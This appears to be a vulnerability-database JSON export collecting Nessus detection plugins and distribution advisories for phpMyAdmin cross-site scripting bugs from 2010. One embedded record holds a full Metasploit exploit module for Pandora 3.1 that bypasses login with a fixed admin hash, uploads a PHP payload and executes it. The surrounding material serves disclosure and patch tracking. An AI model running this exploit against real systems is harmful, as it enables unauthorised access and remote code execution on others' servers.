value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"phpMyAdmin-3.3.8.1-1.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T13:02:08", "description": "Several vulnerabilities have been discovered in phpMyAdmin, a tool to administer MySQL over the web. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2010-4329 Cross site scripting was possible in search, that allowed a remote attacker to inject arbitrary web script or HTML.\n\n - CVE-2010-4480 Cross site scripting was possible in errors, that allowed a remote attacker to inject arbitrary web script or HTML.\n\n - CVE-2010-4481 Display of PHP's phpinfo() function was available to world, but only if this functionality had been enabled (defaults to off). This may leak some information about the host system.", "cvss3": {"score": null, "vector": null}, "published": "2011-01-03T00:00:00", "type": "nessus", "title": "Debian DSA-2139-1 : phpmyadmin - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4329", "CVE-2010-4480", "CVE-2010-4481"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:phpmyadmin", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-2139.NASL", "href": "https://www.tenable.com/plugins/nessus/51401", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2139. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51401);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2010-4329\", \"CVE-2010-4480\", \"CVE-2010-4481\");\n script_bugtraq_id(45100);\n script_xref(name:\"DSA\", value:\"2139\");\n\n script_name(english:\"Debian DSA-2139-1 : phpmyadmin - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in phpMyAdmin, a tool to\nadminister MySQL over the web. The Common Vulnerabilities and\nExposures project identifies the following problems :\n\n - CVE-2010-4329\n Cross site scripting was possible in search, that\n allowed a remote attacker to inject arbitrary web script\n or HTML.\n\n - CVE-2010-4480\n Cross site scripting was possible in errors, that\n allowed a remote attacker to inject arbitrary web script\n or HTML.\n\n - CVE-2010-4481\n Display of PHP's phpinfo() function was available to\n world, but only if this functionality had been enabled\n (defaults to off). This may leak some information about\n the host system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-4329\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-4480\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-4481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2010/dsa-2139\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the phpmyadmin package.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.11.8.1-5+lenny7.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"phpmyadmin\", reference:\"2.11.8.1-5+lenny7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-02-06T09:12:27", "description": "This Metasploit module exploits an authentication bypass vulnerability in Pandora version 3.1 as disclosed by Juan Galiana Lara. It also integrates with the built-in pandora upload which allows a user to upload arbitrary files to the '/images/' directory. This Metasploit module was created as an exercise in the Metasploit Mastery Class at Blackhat that was facilitated by egypt and mubix.", "cvss3": {}, "published": "2015-01-07T00:00:00", "type": "zdt", "title": "Pandora 3.1 Auth Bypass / Arbitrary File Upload Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-4279"], "modified": "2015-01-07T00:00:00", "id": "1337DAY-ID-23084", "href": "https://0day.today/exploit/description/23084", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits an authentication bypass vulnerability in Pandora v3.1 as\r\n disclosed by Juan Galiana Lara. It also integrates with the built-in pandora\r\n upload which allows a user to upload arbitrary files to the '/images/' directory.\r\n\r\n This module was created as an exercise in the Metasploit Mastery Class at Blackhat\r\n that was facilitated by egypt and mubix.\r\n\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Juan Galiana Lara', # Vulnerability discovery\r\n 'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module\r\n 'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module\r\n 'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module\r\n '_flood <freshbones[at]gmail.com>', # Metasploit module\r\n 'mubix <mubix[at]room362.com>', # Auth bypass and file upload\r\n 'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2010-4279'],\r\n ['OSVDB', '69549'],\r\n ['BID', '45112']\r\n ],\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n ['Automatic Targeting', { 'auto' => true }]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Nov 30 2010\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\r\n base = target_uri.path\r\n\r\n # retrieve software version from login page\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php')\r\n })\r\n if res and res.code == 200\r\n #Tested on v3.1 Build PC100609 and PC100608\r\n if res.body.include?(\"v3.1 Build PC10060\")\r\n return Exploit::CheckCode::Appears\r\n elsif res.body.include?(\"Pandora\")\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n return Exploit::CheckCode::Safe\r\n rescue ::Rex::ConnectionError\r\n print_error(\"#{peer} - Connection failed\")\r\n end\r\n return Exploit::CheckCode::Unknown\r\n\r\n end\r\n\r\n # upload a payload using the pandora built-in file upload\r\n def upload(base, file, cookies)\r\n data = Rex::MIME::Message.new\r\n data.add_part(file, 'application/octet-stream', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{@fname}\\\"\")\r\n data.add_part(\"Go\", nil, nil, 'form-data; name=\"go\"')\r\n data.add_part(\"images\", nil, nil, 'form-data; name=\"directory\"')\r\n data.add_part(\"1\", nil, nil, 'form-data; name=\"upload_file\"')\r\n data_post = data.to_s\r\n data_post = data_post.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'cookie' => cookies,\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'vars_get' => {\r\n 'sec' => 'gsetup',\r\n 'sec2' => 'godmode/setup/file_manager',\r\n },\r\n 'data' => data_post\r\n })\r\n\r\n register_files_for_cleanup(@fname)\r\n return res\r\n end\r\n\r\n def exploit\r\n\r\n base = target_uri.path\r\n @fname = \"#{rand_text_numeric(7)}.php\"\r\n cookies = \"\"\r\n\r\n # bypass authentication and get session cookie\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'index.php'),\r\n 'vars_get' => {\r\n 'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',\r\n 'loginhash_user' => 'admin',\r\n 'loginhash' => '1',\r\n },\r\n })\r\n\r\n # fix if logic\r\n if res and res.code == 200\r\n if res.body.include?(\"Logout\")\r\n cookies = res.get_cookies\r\n print_status(\"Login Bypass Successful\")\r\n print_status(\"cookie monster = \" + cookies)\r\n else\r\n fail_with(Exploit::Failure::NotVulnerable, \"Login Bypass Failed\")\r\n end\r\n end\r\n\r\n # upload PHP payload to images/[fname]\r\n print_status(\"#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)\")\r\n php = %Q|<?php #{payload.encoded} ?>|\r\n begin\r\n res = upload(base, php, cookies)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n if res and res.code == 200\r\n print_good(\"#{peer} - File uploaded successfully\")\r\n else\r\n fail_with(Exploit::Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\")\r\n end\r\n\r\n # retrieve and execute PHP payload\r\n print_status(\"#{peer} - Executing payload (images/#{@fname})\")\r\n begin\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(base, 'images', \"#{@fname}\")\r\n }, 1)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Exploit::Failure::Unreachable, \"#{peer} - Connection failed\")\r\n end\r\n\r\n end\r\nend\n\n# 0day.today [2018-02-06] #", "sourceHref": "https://0day.today/exploit/23084", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2022-01-19T16:03:50", "description": "\n\nphpMyAdmin team reports:\n\nIt was possible to conduct a XSS attack using spoofed request on the\n\t db search script.\n\n\n", "cvss3": {}, "published": "2010-11-29T00:00:00", "type": "freebsd", "title": "phpMyAdmin -- XSS attack in database search", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4329"], "modified": "2010-11-29T00:00:00", "id": "753F8185-5BA9-42A4-BE02-3F55EE580093", "href": "https://vuxml.freebsd.org/freebsd/753f8185-5ba9-42a4-be02-3f55ee580093.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "phpmyadmin": [{"lastseen": "2021-07-28T14:34:00", "description": "## PMASA-2010-8\n\n**Announcement-ID:** PMASA-2010-8\n\n**Date:** 2010-11-29\n\n### Summary\n\nXSS attack in database search.\n\n### Description\n\nIt was possible to conduct a XSS attack using spoofed request on the db search script.\n\n### Severity\n\nWe consider this vulnerability to be non critical.\n\n### Affected Versions\n\nFor 3.x: versions before 3.3.8.1 are affected. For 2.11.x: versions before 2.11.11.1 are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 3.3.8.1 or newer, or 2.11.11.1 if using the 2.11.x family. You can also apply the patch listed below.\n\n### References\n\nThanks to Alexander Opitz for reporting this issue.\n\nAssigned CVE ids: [CVE-2010-4329](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4329>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [4341818d73d454451f024950a4ce0141608ac7f8](<https://github.com/phpmyadmin/phpmyadmin/commit/4341818d73d454451f024950a4ce0141608ac7f8>)\n\nThe following commits have been made on the 2.11 branch to fix this issue:\n\n * [e1f4901ffc400b6d2df15eac0ba5015fe48a27c4](<https://github.com/phpmyadmin/phpmyadmin/commit/e1f4901ffc400b6d2df15eac0ba5015fe48a27c4>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "cvss3": {}, "published": "2010-11-29T00:00:00", "type": "phpmyadmin", "title": "XSS attack in database search.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4329"], "modified": "2010-11-29T00:00:00", "id": "PHPMYADMIN:PMASA-2010-8", "href": "https://www.phpmyadmin.net/security/PMASA-2010-8/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2021-06-08T18:43:51", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields, manage privileges, export data into various formats and is available in over 55 languages. ", "cvss3": {}, "published": "2010-12-08T21:36:02", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: phpMyAdmin-3.3.8.1-1.fc13", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4329"], "modified": "2010-12-08T21:36:02", "id": "FEDORA:AE678110DF3", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QIXWDX2F37RXIYCOFNQCHP7ZDJURJUA2/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-06-08T18:43:51", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields, manage privileges, export data into various formats and is available in over 55 languages. ", "cvss3": {}, "published": "2010-12-08T21:34:18", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: phpMyAdmin-3.3.8.1-1.fc14", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4329"], "modified": "2010-12-08T21:34:18", "id": "FEDORA:AF651110971", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/O5XH5N3ODLXVSCBLJGTT3FEXXUTMP4BI/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:35:14", "description": "Cross-site scripting (XSS) vulnerability in the PMA_linkOrButton function\nin libraries/common.lib.php in the database (db) search script in\nphpMyAdmin 2.11.x before 2.11.11.1 and 3.x before 3.3.8.1 allows remote\nattackers to inject arbitrary web script or HTML via a crafted request.", "cvss3": {}, "published": "2010-12-02T00:00:00", "type": "ubuntucve", "title": "CVE-2010-4329", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4329"], "modified": "2010-12-02T00:00:00", "id": "UB:CVE-2010-4329", "href": "https://ubuntu.com/security/CVE-2010-4329", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "debiancve": [{"lastseen": "2022-07-09T17:35:18", "description": "Cross-site scripting (XSS) vulnerability in the PMA_linkOrButton function in libraries/common.lib.php in the database (db) search script in phpMyAdmin 2.11.x before 2.11.11.1 and 3.x before 3.3.8.1 allows remote attackers to inject arbitrary web script or HTML via a crafted request.", "cvss3": {}, "published": "2010-12-02T16:22:00", "type": "debiancve", "title": "CVE-2010-4329", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4329"], "modified": "2010-12-02T16:22:00", "id": "DEBIANCVE:CVE-2010-4329", "href": "https://security-tracker.debian.org/tracker/CVE-2010-4329", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "osv": [{"lastseen": "2022-07-21T08:31:51", "description": "\nSeveral vulnerabilities have been discovered in phpMyAdmin, a tool\nto administer MySQL over the web. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\n\n* [CVE-2010-4329](https://security-tracker.debian.org/tracker/CVE-2010-4329)\nCross site scripting was possible in search, that allowed\n a remote attacker to inject arbitrary web script or HTML.\n* [CVE-2010-4480](https://security-tracker.debian.org/tracker/CVE-2010-4480)\nCross site scripting was possible in errors, that allowed\n a remote attacker to inject arbitrary web script or HTML.\n* [CVE-2010-4481](https://security-tracker.debian.org/tracker/CVE-2010-4481)\nDisplay of PHP's phpinfo() function was available to world, but only\n if this functionality had been enabled (defaults to off). This may\n leak some information about the host system.\n\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.11.8.1-5+lenny7.\n\n\nFor the testing (squeeze) and unstable distribution (sid), these problems\nhave been fixed in version 3.3.7-3.\n\n\nWe recommend that you upgrade your phpmyadmin package.\n\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: [https://www.debian.org/security/]($(HOME)/security/)\n\n\n", "cvss3": {}, "published": "2010-12-31T00:00:00", "type": "osv", "title": "phpmyadmin - several", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4329", "CVE-2010-4480", "CVE-2010-4481"], "modified": "2022-07-21T05:47:18", "id": "OSV:DSA-2139-1", "href": "https://osv.dev/vulnerability/DSA-2139-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2021-10-22T00:30:18", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2139-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nDecember 31, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : phpmyadmin\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2010-4329 CVE-2010-4480 CVE-2010-4481\n\nSeveral vulnerabilities have been discovered in phpMyAdmin, a tool\nto administer MySQL over the web. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2010-4329\n\n Cross site scripting was possible in search, that allowed\n a remote attacker to inject arbitrary web script or HTML.\n\nCVE-2010-4480\n\n Cross site scripting was possible in errors, that allowed\n a remote attacker to inject arbitrary web script or HTML.\n\nCVE-2010-4481\n\n Display of PHP's phpinfo() function was available to world, but only\n if this functionality had been enabled (defaults to off). This may\n leak some information about the host system.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.11.8.1-5+lenny7.\n\nFor the testing (squeeze) and unstable distribution (sid), these problems\nhave been fixed in version 3.3.7-3.\n\nWe recommend that you upgrade your phpmyadmin package.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2010-12-31T15:57:29", "type": "debian", "title": "[SECURITY] [DSA 2139-1] New phpmyadmin packages fix several vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4329", "CVE-2010-4480", "CVE-2010-4481"], "modified": "2010-12-31T15:57:29", "id": "DEBIAN:DSA-2139-1:FDD12", "href": "https://lists.debian.org/debian-security-announce/2010/msg00190.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}

Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;

Description

Affected Software

Related

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)